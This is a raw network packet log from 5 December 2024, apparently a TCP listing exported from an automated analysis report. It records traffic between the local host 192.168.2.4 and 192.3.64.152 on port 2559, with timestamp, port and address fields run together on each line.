                                                                                                                                              Dec 5, 2024 18:26:54.278440952 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.300479889 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.309626102 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.362131119 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.364351988 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.397795916 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.397813082 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.397895098 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.397941113 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.398279905 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.398492098 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.398756027 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.398838997 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.398875952 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.442014933 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.482698917 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.482958078 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.482978106 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.484247923 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.484447956 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.484575987 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.484702110 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.484797001 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.526655912 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.563589096 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.583841085 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.585561037 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.597840071 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.704391956 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.704480886 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.704526901 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.704667091 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.704750061 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.704826117 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.705420971 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.707067013 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.707248926 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.708580017 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.709085941 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.709131002 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.720215082 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.754417896 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.822761059 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.874203920 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.878926992 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.880606890 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.910271883 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.999610901 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.999624968 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.999629974 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.999638081 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.999641895 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.999645948 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.999650002 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.000878096 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.000967979 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.001133919 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.001301050 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.001318932 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.015548944 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.030313969 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.051189899 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.081037998 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.082989931 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.171873093 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.191783905 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.194658041 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.205833912 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.205970049 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.206250906 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.207484961 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.207643032 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.207813025 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.207988977 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.241722107 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.243304968 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.244462967 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.314487934 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.332561970 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.362224102 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.362577915 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.364990950 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.393825054 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.452594995 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.468033075 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.503768921 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.554408073 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.574325085 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.578068018 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.590944052 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.750092983 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.894716978 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.941708088 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.003806114 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.122289896 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.154000998 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.156037092 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.193640947 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.195488930 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.242115021 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.245955944 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.248752117 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.249699116 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.274080038 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.274384975 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.274797916 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.274964094 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.275079966 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.275202036 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.277542114 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.277656078 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.278004885 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.278182983 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.313644886 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.313800097 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.313880920 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.313958883 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.314039946 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.315222979 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.315335989 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.315418005 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.315459967 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.315558910 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.356456995 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.365856886 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.366028070 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.366079092 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.366219997 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.366338968 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.366415024 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.368927956 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.368988037 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.369132042 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.369220972 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.369266987 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.369730949 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.375447989 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.390818119 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.392823935 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.452486992 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.454508066 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.497070074 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.497169971 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.502159119 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.513245106 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.513257027 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.513268948 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.513278008 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.513612032 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.513854027 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.514270067 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.567234993 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.568926096 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.573697090 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.574125051 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.575239897 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.575325012 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.576508045 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.576639891 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.577783108 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.577811003 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.578912973 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.579339981 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.579827070 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.616873026 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.616997004 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.691101074 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.691162109 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.693978071 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.693988085 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.694000959 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.696871996 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.696942091 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.699601889 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.699620962 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.699656963 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.702246904 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.736752987 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.736812115 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.755857944 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.757627964 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.766073942 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.800009966 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.801791906 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.856590986 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.856718063 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.876223087 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.876389027 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.877378941 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.877907038 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.883095026 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.921741962 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.922205925 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.922305107 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.922373056 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.922467947 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.922487974 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.923449993 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.925079107 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:56.976519108 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.976638079 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.000359058 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.035202026 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.037242889 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.044434071 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.044543982 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.045653105 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.045897007 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.045908928 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.046741962 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.046755075 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.046763897 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.047502041 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.047575951 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.098707914 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.100301027 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.117635965 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.161003113 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.166244984 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.166300058 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.171132088 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.171169043 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.175069094 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.176794052 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.177184105 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.177194118 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.179847956 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.179961920 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.220470905 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.224045992 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.228064060 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.298135996 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.298162937 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.300905943 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.300960064 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.303706884 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.303987026 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.304758072 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.307137966 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.307203054 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.312699080 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.315217018 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.351989031 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.352082968 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.363467932 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.365209103 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.374598026 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.433922052 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.435606003 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.473432064 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.473541975 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.483504057 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.483691931 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.483799934 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.483910084 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.484004974 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.484150887 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.484397888 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.486614943 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.498686075 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.552520037 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.554289103 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.556582928 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.556725025 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.558760881 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.558882952 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.559698105 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.559755087 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.559767008 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.559917927 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.560107946 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.560256004 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.560344934 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.560420036 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.594113111 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.594248056 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.608318090 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.642743111 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.645030975 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.672718048 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.672785044 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.672954082 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.673103094 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.673249960 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.674077034 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.674307108 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.674426079 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.674453974 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.674580097 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.675523043 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.714000940 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.714067936 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.723299980 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.725157022 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.748812914 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.763644934 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.763725996 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.764839888 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.765208006 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.766418934 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.767359972 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.767380953 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.767487049 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.767555952 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.786345005 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.788427114 CET497422559192.168.2.4192.3.64.152
